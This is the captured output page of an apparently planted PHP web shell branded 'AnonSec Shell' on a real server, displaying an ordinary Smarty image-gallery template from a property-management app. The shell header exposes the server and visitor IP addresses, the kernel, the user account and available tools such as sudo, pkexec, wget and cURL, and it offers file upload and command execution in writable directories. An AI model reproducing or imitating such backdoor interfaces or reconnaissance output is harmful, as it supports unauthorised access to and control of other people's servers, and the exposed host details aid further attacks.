AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.216.192
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/www/lrsys_apps/imobles/application/plugins/module_imobles/views/enterprises/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/www/lrsys_apps/imobles/application/plugins/module_imobles/views/enterprises/images.tpl
<div class="wrapper wrapper-content" style="padding-bottom: 0;">
    {$title_action = $_L['module imobles enterprise images']}
    <div class="row">

        <div class="col-md-12">

            <div class="ibox float-e-margins">

                <div class="ibox-title">
                    <h5>{$title_action}</h5>
                    <a href="{$_url}module_imobles/enterprises/listAll"
                       class="btn btn-xs btn-primary btn-rounded pull-right">
                        <i class="fa fa-bars"></i> {$_L['module imobles list enterprise']}
                    </a>
                </div>

                <div class="ibox-content" id="ibox_form_entreprise">

                    {*<div class="alert alert-danger" id="emsg">
                    <span id="emsgbody"></span>
                    </div>*}



                    <!-- DADOS GERAIS -->
                    <div id="row" class="">

                        <div class="col-sm-12 col-md-12">

                            {$_L['module imobles entreprise name']} : <b>{$enterprises->name}
                            </b>
                            <div class='pull-right'>         {$_L['ID']} :
                                <b>{$enterprises->id}</b>
                            </div>

                        </div>
                        <div class="col-sm-12 col-md-12">
                            {$_L['module imobles type image']} :
                            <b>{$descType}</b>
                        </div>
                        {if $type=='backend'}
                            <div class="col-sm-12 col-md-12">
                                <label >{$_L['module imobles tags']}</label> 
                                <form action="{U}module_imobles/enterprises/images/{$type}/{$enterprises->id}" method="post"  id="form-filter" class="search">
                                    <select class="form-control" id="filterTags" multiple=""  name="tags[]">
                                        {$selectedTags} 
                                    </select>
                                </form>
                            </div>
                        {/if}
                        <div class="col-sm-12 col-md-12">
                            <br/>
                            <form id="form-enterprises-images" >
                                <div style="position:relative;">
                                    <a class='btn btn-info col-xs-12 col-md-2'>
                                        <span class="hidden-xs"> {$_L['module imobles send photo']} </span>
                                        <input type="file" multiple="" class='col-xs-12' data-toggle="tooltip" data-placement="top"  style='position:absolute;z-index:2;top:0;left:0;filter: alpha(opacity=0);-ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";opacity:0;background-color:transparent;color:transparent;' name="file[]" size="40"  onchange='uploadArquivo("")'>
                                    </a>
                                </div>
                                <input name="type" id="type_form" value="{$type}" type="hidden">
                                <input name="module_imobles_enterprise_id" value="{$enterprises->id}" type="hidden">
                            </form>
                            <br/> <br/>
                        </div>
                        <div class="row top15">
                            <br/>
                            {foreach $images as $a}
                                <div class='col-xs-12 col-md-4 center div_image_{$a->id}'>
                                    <center>
                                        <img style='border-radius: 10px;height: 200px' class="img-responsive" src="{APP_URL}/application/plugins/module_imobles/uploads/enterprise/{$enterprises->id}/images/{$a->src}">
                                    </center>

                                    <div class='col-xs-9 top10'>
                                        {if empty ($a->description) && empty($a->desc_tags)}
                                            <a href="#" data-type="{$a->type}" data-id="{$a->id}" class=" edit_image">{$_L['module imobles add legend']}</a>
                                        {else}
                                            {$_L['Description']}:{$a->description}
                                            <br/>
                                            {$_L['module imobles tags']}:{$a->desc_tags}
                                        {/if}

                                    </div>

                                    <div class='col-xs-3 pull-right top10 no-padding' >

                                        <a href="#" onclick="confirmDeleteImage({$a->id})" class="btn btn-xs btn-danger pull-right"
                                           data-toggle="tooltip" title="{$_L['Delete']}"> 
                                            <i class="fa fa-trash"></i>  
                                        </a> 
                                        {if empty ($a->description) && empty($a->desc_tags)}
                                        {else}
                                            <a href="#" style="margin-right:5px" class="btn btn-xs btn-warning edit_image pull-right" data-type="{$a->type}" data-id="{$a->id}" ><i class="fa fa-pencil"   data-toggle="tooltip" title="{$_L['Edit']}"></i> </a>
                                        {/if}
                                    </div>
                                </div>
                            {/foreach}
                        </div>
                    </div>
                    <div class="row" style="margin-top:20px">
                        <br/><br/><br/>
                        <div class=" col-md-12 form-group">
                            <div class="col-lg-10">
                                <a href="{$_url}module_imobles/enterprises/listAll">{$_L['Close']}</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>



<input type="hidden" name="_msg_add_new_enterprise_img_listing_tags" id="_msg_add_new_enterprise_img_listing_tags" value="{$_L['module imobles new enterprise_img_listing_tags']}">
<input type="hidden" name="_msg_enterprise_img_listing_tags_name" id="_msg_enterprise_img_listing_tags_name" value="{$_L['module imobles enterprise_img_listing_tags name']}">
<input type="hidden" name="_msg_add_new_enterprise_img_backend_tags" id="_msg_add_new_enterprise_img_backend_tags" value="{$_L['module imobles new enterprise_img_backend_tags']}">
<input type="hidden" name="_msg_enterprise_img_backend_tags_name" id="_msg_enterprise_img_backend_tags_name" value="{$_L['module imobles enterprise_img_backend_tags name']}">
<input type="hidden" name="_msg_edit" id="_msg_edit" value="{$_L['Edit']}">
<input type="hidden" name="_msg_ok" id="_msg_ok" value="{$_L['OK']}">
<input type="hidden" name="_msg_cancel" id="_msg_cancel" value="{$_L['Cancel']}">
<input type="hidden" name="_msg_save" id="_msg_save" value="{$_L['Save']}">

Anon7 - 2022
AnonSec Team